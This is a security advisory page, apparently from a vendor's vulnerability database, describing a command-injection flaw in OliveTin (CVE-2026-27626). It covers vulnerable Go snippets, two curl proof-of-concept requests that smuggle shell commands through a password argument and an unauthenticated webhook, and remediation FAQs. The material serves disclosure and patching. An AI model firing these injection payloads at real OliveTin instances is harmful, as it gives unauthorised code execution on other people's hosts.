Summary
OliveTin's shell mode safety check (checkShellArgumentSafety) blocks several dangerous argument types but not password. A user supplying a password-typed argument can inject shell metacharacters that execute arbitrary OS commands. A second independent vector allows unauthenticated RCE via webhook-extracted JSON values that skip type safety checks entirely before reaching sh -c.
Details
Vector 1, password type bypasses shell safety check (PR:L)
service/internal/executor/arguments.go has two gaps:
// Line 198-199, TypeSafetyCheck returns nil (no error) for password type
case "password":
return nil // accepts ANY string including ; | ` $()
// Line 313, checkShellArgumentSafety blocks dangerous types but not password
unsafe := map[string]bool{
"url": true,
"email": true,
"raw_string_multiline": true,
"very_dangerous_raw_string": true,
// "password" is absent, not blocked
}
Shell execution at service/internal/executor/executor_unix.go:18:
exec.CommandContext(ctx, "sh", "-c", finalParsedCommand)
A user supplies a password argument value of '; id; echo ' → sh -c interprets the shell metacharacters → arbitrary command execution.
This is not the "admin already has access" pattern: OliveTin explicitly enforces an admin/user boundary where admins define commands and users only supply argument values. The password type is the documented, intended mechanism for user-supplied sensitive values. The safety check exists precisely to prevent users from escaping this boundary, password is the one type it fails to block.
Vector 2, Webhook JSON extraction skips TypeSafetyCheck entirely (PR:N)
service/internal/executor/handler.go:153-157 extracts arbitrary key-value pairs from webhook JSON payloads and injects them into ExecutionRequest.Arguments. These webhook-extracted arguments have no corresponding config-defined ActionArgument entry, so parseActionArguments() in arguments.go finds no type to check against and skips TypeSafetyCheck entirely. The values are templated directly into the shell command and passed to sh -c.
Example: an admin command template git pull && echo {{ git_message }} with Shell mode enabled. A webhook POST with {"git_message": "x; id"} injects id into the shell command. The webhook endpoint is unauthenticated by default (authType: none in default config).
PoC
# Vector 1, authenticated user with password-type argument
curl -X POST http://localhost:1337/api/StartAction \
-H "Content-Type: application/json" \
-d '{"actionId": "run-command", "arguments": [{"name": "pass", "value": "'; id; echo '"}]}'
# Vector 2, unauthenticated webhook
curl -X POST http://localhost:1337/webhook/git-deploy \
-H "Content-Type: application/json" \
-d '{"git_message": "x; id #", "git_author": "attacker"}'
Confirmed on jamesread/olivetin:latest (3000.10.0), 3/3 runs. Both vectors produced uid=1000(olivetin) output and arbitrary file write to /tmp/pwned.
Impact
- Vector 1: Any authenticated user (registration enabled by default,
authType: noneby default) can execute arbitrary OS commands on the OliveTin host with the permissions of the OliveTin process. - Vector 2: Unauthenticated attacker can achieve the same if the instance receives webhooks from external sources, which is a primary OliveTin use case.
Combined: unauthenticated RCE on any OliveTin instance using Shell mode with webhook-triggered actions.
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
CVE-2026-27626 has a CVSS score of 9.9 (Critical). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260222101908-4bbd2eab1532); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-27626? CVE-2026-27626 is a critical-severity OS command injection vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260222101908-4bbd2eab1532. It is fixed in 0.0.0-20260222101908-4bbd2eab1532. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2026-27626? CVE-2026-27626 has a CVSS score of 9.9 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-27626? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260222101908-4bbd2eab1532 is affected.
- Is there a fix for CVE-2026-27626? Yes. CVE-2026-27626 is fixed in 0.0.0-20260222101908-4bbd2eab1532. Upgrade to this version or later.
- Is CVE-2026-27626 exploitable, and should I be worried? Whether CVE-2026-27626 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-27626 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-27626? Upgrade
github.com/OliveTin/OliveTinto 0.0.0-20260222101908-4bbd2eab1532 or later.